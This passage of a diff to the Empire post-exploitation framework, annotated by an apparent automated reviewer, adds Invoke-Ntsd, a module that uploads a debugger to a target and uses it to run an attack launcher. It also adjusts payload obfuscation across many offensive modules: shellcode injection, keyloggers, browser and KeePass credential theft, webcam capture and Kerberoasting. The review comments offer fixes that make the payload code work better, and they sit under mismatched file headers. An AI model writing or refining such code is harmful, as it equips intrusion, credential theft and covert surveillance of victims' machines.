except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
- return (HTTPError.code, '')
+ r#if signaled for restaging, exit.
+ if HTTPError.code == 401:
+ sys.exit(0)
except urllib2.URLError as URLerror:
# if the server cannot be reached
diff --git a/lib/listeners/http_hop.py b/lib/listeners/http_hop.py
index fbc606e..f03703e 100644
--- a/lib/listeners/http_hop.py
+++ b/lib/listeners/http_hop.py
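Review bot: `return (HTTPError.code, '')` is deleted but only the 401 case replaces it, so every other HTTP error (404, 500, ...) now falls out of the `except` with `None`, and whatever unpacks `send_message`'s `(code, data)` result will raise TypeError on the next bad checkin. Keep the return after the new check: `if HTTPError.code == 401: sys.exit(0)` and then `return (HTTPError.code, '')`, which is exactly what the http.py version of this hunk does. The first added line, `r#if signaled for restaging, exit.`, has a stray `r` before the comment; as Python that is an expression statement evaluating the name `r`, a NameError (or a silent read of some unrelated variable) before the 401 test ever runs. `sys` must also be importable in the generated foreign agent; its import is not in this hunk.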
@@ -419,6 +419,10 @@ class Listener:
}
catch [System.Net.WebException]{
# exception posting data...
+ if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
+ # restart key negotiation
+ Start-Negotiate -S "$ser" -SK $SK -UA $ua
+ }
}
}
}
@@ -466,7 +470,9 @@ def send_message(packets=None):
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
- return (HTTPError.code, '')
+ #if signaled for restaging, exit.
+ if HTTPError.code == 401:
+ sys.exit(0)
except urllib2.URLError as URLerror:
# if the server cannot be reached
diff --git a/lib/listeners/http_mapi.py b/lib/listeners/http_mapi.py
index 5bb07ef..d3a172a 100644
--- a/lib/listeners/http_mapi.py
+++ b/lib/listeners/http_mapi.py
@@ -5,6 +5,7 @@ import os
import ssl
import time
import copy
+import sys
from pydispatch import dispatcher
from flask import Flask, request, make_response
@@ -616,7 +617,17 @@ class Listener:
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
- context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
+
+ # support any version of tls
+ pyversion = sys.version_info
+ if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
+ proto = ssl.PROTOCOL_TLS
+ elif pyversion[0] >= 3:
+ proto = ssl.PROTOCOL_TLS
+ else:
+ proto = ssl.PROTOCOL_SSLv23
+
+ context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
diff --git a/lib/modules/powershell/code_execution/invoke_dllinjection.py b/lib/modules/powershell/code_execution/invoke_dllinjection.py
index 3f2a94e..682b8d7 100644
--- a/lib/modules/powershell/code_execution/invoke_dllinjection.py
+++ b/lib/modules/powershell/code_execution/invoke_dllinjection.py
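Review bot: Here too `return (HTTPError.code, '')` is removed but only replaced for the 401 case, so a 404 or 500 leaves `send_message` returning `None` instead of a `(code, data)` pair and the caller's unpacking fails; the http.py hunk in this same diff keeps the return after the 401 test, and this one should match: `if HTTPError.code == 401: sys.exit(0)` followed by `return (HTTPError.code, '')`. Confirm as well that `sys` is imported in the generated hop agent, since the import is not visible in this hunk.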
@@ -88,6 +88,6 @@ class Module:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
diff --git a/lib/modules/powershell/code_execution/invoke_metasploitpayload.py b/lib/modules/powershell/code_execution/invoke_metasploitpayload.py
index 38c4c6d..62c83f8 100644
--- a/lib/modules/powershell/code_execution/invoke_metasploitpayload.py
+++ b/lib/modules/powershell/code_execution/invoke_metasploitpayload.py
@@ -72,6 +72,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
diff --git a/lib/modules/powershell/code_execution/invoke_ntsd.py b/lib/modules/powershell/code_execution/invoke_ntsd.py
new file mode 100644
index 0000000..4ba07e9
--- /dev/null
+++ b/lib/modules/powershell/code_execution/invoke_ntsd.py
@@ -0,0 +1,165 @@
+from lib.common import helpers
+import base64
+
+class Module:
+
+ def __init__(self, mainMenu, params=[]):
+
+ self.info = {
+ 'Name': 'Invoke-Ntsd',
+
+ 'Author': ['james fitts'],
+
+ 'Description': ("Use NT Symbolic Debugger to execute Empire launcher code"),
+
+ 'Background' : True,
+
+ 'OutputExtension' : None,
+
+ 'NeedsAdmin' : False,
+
+ 'OpsecSafe' : False,
+
+ 'Language' : 'powershell',
+
+ 'MinLanguageVersion' : '2',
+
+ 'Comments': [""]
+ }
+
+ # any options needed by the module, settable during runtime
+ self.options = {
+ # format:
+ # value_name : {description, required, default_value}
+ 'Agent' : {
+ 'Description' : 'Agent to run module on.',
+ 'Required' : True,
+ 'Value' : ''
+ },
+ 'UploadPath' : {
+ 'Description' : 'Path to drop dll (C:\Users\Administrator\Desktop).',
+ 'Required' : False,
+ 'Value' : ''
+ },
+ 'Listener' : {
+ 'Description' : 'Listener to use.',
+ 'Required' : True,
+ 'Value' : ''
+ },
+ 'UserAgent' : {
+ 'Description' : 'User-agent string to use for the staging request (default, none, or other).',
+ 'Required' : False,
+ 'Value' : 'default'
+ },
+ 'Proxy' : {
+ 'Description' : 'Proxy to use for request (default, none, or other).',
+ 'Required' : False,
+ 'Value' : 'default'
+ },
+ 'BinPath' : {
+ 'Description' : 'Binary to set NTSD to debug.',
+ 'Required' : True,
+ 'Value' : "C:\\Windows\\System32\\calc.exe"
+ },
+ 'Arch' : {
+ 'Description' : 'Architecture the system is on.',
+ 'Required' : True,
+ 'Value' : 'x64'
+ },
+ 'ProxyCreds' : {
+ 'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
+ 'Required' : False,
+ 'Value' : 'default'
+ }
+ }
+
+ # save off a copy of the mainMenu object to access external functionality
+ # like listeners/agent handlers/etc.
+ self.mainMenu = mainMenu
+
+ for param in params:
+ # parameter format is [Name, Value]
+ option, value = param
+ if option in self.options:
+ self.options[option]['Value'] = value
+
+
+ def generate(self, obfuscate=False, obfuscationCommand=""):
+
+ listenerName = self.options['Listener']['Value']
+ uploadPath = self.options['UploadPath']['Value'].strip()
+ bin = self.options['BinPath']['Value']
+ arch = self.options['Arch']['Value']
+ ntsd_exe_upload_path = uploadPath + "\\" + "ntsd.exe"
+ ntsd_dll_upload_path = uploadPath + "\\" + "ntsdexts.dll"
+
+ # staging options
+ userAgent = self.options['UserAgent']['Value']
+ proxy = self.options['Proxy']['Value']
+ proxyCreds = self.options['ProxyCreds']['Value']
+
+ if arch == 'x64':
+ ntsd_exe = self.mainMenu.installPath + "data/module_source/code_execution/ntsd_x64.exe"
+ ntsd_dll = self.mainMenu.installPath + "data/module_source/code_execution/ntsdexts_x64.dll"
+ elif arch == 'x86':
+ ntsd_exe = self.mainMenu.installPath + "data/module_source/code_execution/ntsd_x86.exe"
+ ntsd_dll = self.mainMenu.installPath + "data/module_source/code_execution/ntsdexts_x86.dll"
+
+ # read in the common module source code
+ moduleSource = self.mainMenu.installPath + "data/module_source/code_execution/Invoke-Ntsd.ps1"
+ if obfuscate:
+ helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
+ moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
+ try:
+ f = open(moduleSource, 'r')
+ except:
+ print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
+ return ""
+
+ moduleCode = f.read()
+ f.close()
+
+ script = moduleCode
+ scriptEnd = ""
+ if not self.mainMenu.listeners.is_listener_valid(listenerName):
+ # not a valid listener, return nothing for the script
+ print helpers.color("[!] Invalid listener: %s" %(listenerName))
+ return ''
+ else:
+
+ l = self.mainMenu.stagers.stagers['multi/launcher']
+ l.options['Listener']['Value'] = self.options['Listener']['Value']
+ l.options['UserAgent']['Value'] = self.options['UserAgent']['Value']
+ l.options['Proxy']['Value'] = self.options['Proxy']['Value']
+ l.options['ProxyCreds']['Value'] = self.options['ProxyCreds']['Value']
+ launcher = l.generate()
+
+ if launcher == '':
+ print helpers.color('[!] Error in launcher generation.')
+ return ''
+ else:
+ launcherCode = launcher.split(' ')[-1]
+
+ with open(ntsd_exe, 'rb') as bin_data:
+ ntsd_exe_data = bin_data.read()
+
+ with open(ntsd_dll, 'rb') as bin_data:
+ ntsd_dll_data = bin_data.read()
+
+ exec_write = "Write-Ini %s \"%s\"" % (uploadPath, launcher)
+ code_exec = "%s\\ntsd.exe -cf %s\\ntsd.ini %s" % (uploadPath, uploadPath, bin)
+ ntsd_exe_upload = self.mainMenu.stagers.generate_upload(ntsd_exe_data, ntsd_exe_upload_path)
+ ntsd_dll_upload = self.mainMenu.stagers.generate_upload(ntsd_dll_data, ntsd_dll_upload_path)
+
+ script += "\r\n"
+ script += ntsd_exe_upload
+ script += ntsd_dll_upload
+ script += "\r\n"
+ script += exec_write
+ script += "\r\n"
+ # this is to make sure everything was uploaded properly
+ script += "Start-Sleep -s 5"
+ script += "\r\n"
+ script += code_exec
+
+ return script
diff --git a/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py b/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py
index 531b1f9..7851ee4 100644
--- a/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py
+++ b/lib/modules/powershell/code_execution/invoke_reflectivepeinjection.py
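Review bot: `generate` assigns `ntsd_exe` / `ntsd_dll` only for `arch` of `x64` or `x86`, so any other value reaches `open(ntsd_exe, 'rb')` as a NameError, and `UploadPath` is optional with an empty default, so the upload targets become `\ntsd.exe` and `\ntsdexts.dll` at the drive root and `code_exec` turns into `\ntsd.exe -cf \ntsd.ini ...`; both need validating before anything is read or built, and the arch-to-filename mapping reads better as one table (below). `launcherCode = launcher.split(' ')[-1]` is computed and never used, while `exec_write` embeds the entire `launcher` between double quotes with no escaping, so the intent — write the encoded command or the whole command line into ntsd.ini — should be made explicit in a comment and the unused variable dropped. Smaller points: `bin` shadows the builtin, `params=[]` is a mutable default (harmless here since it is only iterated), and the bare `except:` around `open(moduleSource)` hides the real error; `except IOError as e:` and including `e` in the message costs nothing.
```python
        uploadPath = self.options['UploadPath']['Value'].strip()
        arch = self.options['Arch']['Value']
        src_dir = self.mainMenu.installPath + "data/module_source/code_execution/"
        arch_files = {
            'x64': ("ntsd_x64.exe", "ntsdexts_x64.dll"),
            'x86': ("ntsd_x86.exe", "ntsdexts_x86.dll"),
        }
        # both values are operator-supplied; reject before touching disk or the listener
        if arch not in arch_files or not uploadPath:
            print helpers.color("[!] Arch must be x64 or x86 and UploadPath must be set")
            return ''
        exe_name, dll_name = arch_files[arch]
        ntsd_exe = src_dir + exe_name
        ntsd_dll = src_dir + dll_name
        # … unchanged: module source read, listener check, upload/exec assembly …
```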
@@ -127,6 +127,6 @@ class Module:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
diff --git a/lib/modules/powershell/code_execution/invoke_shellcode.py b/lib/modules/powershell/code_execution/invoke_shellcode.py
index 2bf16e6..354c783 100644
--- a/lib/modules/powershell/code_execution/invoke_shellcode.py
+++ b/lib/modules/powershell/code_execution/invoke_shellcode.py
@@ -145,6 +145,6 @@ class Module:
scriptEnd += "; 'Shellcode injected.'"
if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
diff --git a/lib/modules/powershell/code_execution/invoke_shellcodemsil.py b/lib/modules/powershell/code_execution/invoke_shellcodemsil.py
index fe0d112..e18b565 100644
--- a/lib/modules/powershell/code_execution/invoke_shellcodemsil.py
+++ b/lib/modules/powershell/code_execution/invoke_shellcodemsil.py
@@ -89,6 +89,6 @@ class Module:
sc = ",0".join(values['Value'].split("\\"))[1:]
scriptEnd += " -" + str(option) + " @(" + sc + ")"
if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
diff --git a/lib/modules/powershell/collection/ChromeDump.py b/lib/modules/powershell/collection/ChromeDump.py
index 1c3ccd0..dec2c33 100644
--- a/lib/modules/powershell/collection/ChromeDump.py
+++ b/lib/modules/powershell/collection/ChromeDump.py
@@ -103,6 +103,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
diff --git a/lib/modules/powershell/collection/FoxDump.py b/lib/modules/powershell/collection/FoxDump.py
index 29ae719..b7fb455 100644
--- a/lib/modules/powershell/collection/FoxDump.py
+++ b/lib/modules/powershell/collection/FoxDump.py
@@ -107,6 +107,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
diff --git a/lib/modules/powershell/collection/USBKeylogger.py b/lib/modules/powershell/collection/USBKeylogger.py
index 3ab8daf..8fa6881 100644
--- a/lib/modules/powershell/collection/USBKeylogger.py
+++ b/lib/modules/powershell/collection/USBKeylogger.py
@@ -79,6 +79,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
diff --git a/lib/modules/powershell/collection/WebcamRecorder.py b/lib/modules/powershell/collection/WebcamRecorder.py
index 763cf41..6258f09 100644
--- a/lib/modules/powershell/collection/WebcamRecorder.py
+++ b/lib/modules/powershell/collection/WebcamRecorder.py
@@ -216,5 +216,5 @@ Start-WebcamRecorder"""
else:
script += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script
diff --git a/lib/modules/powershell/collection/browser_data.py b/lib/modules/powershell/collection/browser_data.py
index 0a455b5..6f0f9a0 100644
--- a/lib/modules/powershell/collection/browser_data.py
+++ b/lib/modules/powershell/collection/browser_data.py
@@ -103,6 +103,6 @@ class Module:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
diff --git a/lib/modules/powershell/collection/clipboard_monitor.py b/lib/modules/powershell/collection/clipboard_monitor.py
index d12fe04..e13bac2 100644
--- a/lib/modules/powershell/collection/clipboard_monitor.py
+++ b/lib/modules/powershell/collection/clipboard_monitor.py
@@ -89,6 +89,6 @@ class Module:
else:
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script
diff --git a/lib/modules/powershell/collection/file_finder.py b/lib/modules/powershell/collection/file_finder.py
index e66d908..8b8f7bf 100644
--- a/lib/modules/powershell/collection/file_finder.py
+++ b/lib/modules/powershell/collection/file_finder.py
@@ -162,5 +162,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/collection/find_interesting_file.py b/lib/modules/powershell/collection/find_interesting_file.py
index 1a68474..6795ee6 100644
--- a/lib/modules/powershell/collection/find_interesting_file.py
+++ b/lib/modules/powershell/collection/find_interesting_file.py
@@ -127,5 +127,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/collection/get_indexed_item.py b/lib/modules/powershell/collection/get_indexed_item.py
index 3039b13..37c8a8e 100644
--- a/lib/modules/powershell/collection/get_indexed_item.py
+++ b/lib/modules/powershell/collection/get_indexed_item.py
@@ -88,6 +88,6 @@ class Module:
 scriptEnd += " | ?{!($_.ITEMURL -like '*AppData*')} | Select-Object ITEMURL, COMPUTERNAME, FILEOWNER, SIZE, DATECREATED, DATEACCESSED, DATEMODIFIED, AUTOSUMMARY"
 scriptEnd += " | fl | Out-String;"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/collection/get_sql_column_sample_data.py b/lib/modules/powershell/collection/get_sql_column_sample_data.py
index 7f9d007..3f32243 100644
--- a/lib/modules/powershell/collection/get_sql_column_sample_data.py
+++ b/lib/modules/powershell/collection/get_sql_column_sample_data.py
@@ -114,6 +114,6 @@ class Module:
 if no_defaults:
 scriptEnd += " -NoDefaults "
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/collection/get_sql_query.py b/lib/modules/powershell/collection/get_sql_query.py
index bdf45f5..7079566 100644
--- a/lib/modules/powershell/collection/get_sql_query.py
+++ b/lib/modules/powershell/collection/get_sql_query.py
@@ -89,6 +89,6 @@ class Module:
 scriptEnd += " -Instance "+instance
 scriptEnd += " -Query "+"\'"+query+"\'"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/collection/inveigh.py b/lib/modules/powershell/collection/inveigh.py
index 828d8ef..bf3425c 100644
--- a/lib/modules/powershell/collection/inveigh.py
+++ b/lib/modules/powershell/collection/inveigh.py
@@ -232,6 +232,6 @@ class Module:
 else:
 scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\""
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/collection/keylogger.py b/lib/modules/powershell/collection/keylogger.py
index 2318eb6..0a5d619 100644
--- a/lib/modules/powershell/collection/keylogger.py
+++ b/lib/modules/powershell/collection/keylogger.py
@@ -77,6 +77,6 @@ class Module:
 else:
 scriptEnd += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/collection/minidump.py b/lib/modules/powershell/collection/minidump.py
index 0b74e07..ea99308 100644
--- a/lib/modules/powershell/collection/minidump.py
+++ b/lib/modules/powershell/collection/minidump.py
@@ -98,6 +98,6 @@ class Module:
 if option != "Agent" and option != "ProcessName" and option != "ProcessId":
 scriptEnd += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/collection/netripper.py b/lib/modules/powershell/collection/netripper.py
index 0be077d..304b1fa 100644
--- a/lib/modules/powershell/collection/netripper.py
+++ b/lib/modules/powershell/collection/netripper.py
@@ -117,6 +117,6 @@ class Module:
 scriptEnd += ";'Invoke-NetRipper completed.'"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/collection/ninjacopy.py b/lib/modules/powershell/collection/ninjacopy.py
index 8f9aa35..a056072 100644
--- a/lib/modules/powershell/collection/ninjacopy.py
+++ b/lib/modules/powershell/collection/ninjacopy.py
@@ -103,6 +103,6 @@ class Module:
 scriptEnd += "; Write-Output 'Invoke-NinjaCopy Completed'"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/collection/packet_capture.py b/lib/modules/powershell/collection/packet_capture.py
index ae26455..8c367c0 100644
--- a/lib/modules/powershell/collection/packet_capture.py
+++ b/lib/modules/powershell/collection/packet_capture.py
@@ -90,5 +90,5 @@ class Module:
 if persistent != "":
 script += " persistent=yes"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/collection/prompt.py b/lib/modules/powershell/collection/prompt.py
index b0b00da..4339abd 100644
--- a/lib/modules/powershell/collection/prompt.py
+++ b/lib/modules/powershell/collection/prompt.py
@@ -120,5 +120,5 @@ Invoke-Prompt """
 else:
 script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\""
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/collection/screenshot.py b/lib/modules/powershell/collection/screenshot.py
index 091a2d2..b5a4fc2 100644
--- a/lib/modules/powershell/collection/screenshot.py
+++ b/lib/modules/powershell/collection/screenshot.py
@@ -115,5 +115,5 @@ Get-Screenshot"""
 else:
 script += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py b/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py
index a348ea6..282050f 100644
--- a/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py
+++ b/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py
@@ -118,6 +118,6 @@ class Module:
 scriptEnd += "\nFind-KeePassconfig | Get-KeePassConfigTrigger "
 scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/collection/vaults/find_keepass_config.py b/lib/modules/powershell/collection/vaults/find_keepass_config.py
index b4ef71a..5e63397 100644
--- a/lib/modules/powershell/collection/vaults/find_keepass_config.py
+++ b/lib/modules/powershell/collection/vaults/find_keepass_config.py
@@ -90,6 +90,6 @@ class Module:
 scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py b/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py
index b0a0935..a937b0b 100644
--- a/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py
+++ b/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py
@@ -90,6 +90,6 @@ class Module:
 scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/collection/vaults/keethief.py b/lib/modules/powershell/collection/vaults/keethief.py
index 836c398..9122971 100644
--- a/lib/modules/powershell/collection/vaults/keethief.py
+++ b/lib/modules/powershell/collection/vaults/keethief.py
@@ -90,6 +90,6 @@ class Module:
 scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py b/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py
index 7cce50d..5de6543 100644
--- a/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py
+++ b/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py
@@ -92,6 +92,6 @@ class Module:
 scriptEnd += "\nFind-KeePassconfig | Remove-KeePassConfigTrigger "
 scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/credential_injection.py b/lib/modules/powershell/credentials/credential_injection.py
index 30b3638..bf541e4 100644
--- a/lib/modules/powershell/credentials/credential_injection.py
+++ b/lib/modules/powershell/credentials/credential_injection.py
@@ -151,6 +151,6 @@ class Module:
 else:
 scriptEnd += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/enum_cred_store.py b/lib/modules/powershell/credentials/enum_cred_store.py
index c04fa82..7e5afc8 100644
--- a/lib/modules/powershell/credentials/enum_cred_store.py
+++ b/lib/modules/powershell/credentials/enum_cred_store.py
@@ -54,6 +54,6 @@ class Module:
 scriptEnd = "\n%s" %(scriptCmd)
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/credentials/invoke_kerberoast.py b/lib/modules/powershell/credentials/invoke_kerberoast.py
index ec8e320..a94ef2a 100644
--- a/lib/modules/powershell/credentials/invoke_kerberoast.py
+++ b/lib/modules/powershell/credentials/invoke_kerberoast.py
@@ -124,6 +124,6 @@ class Module:
 scriptEnd += '| fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
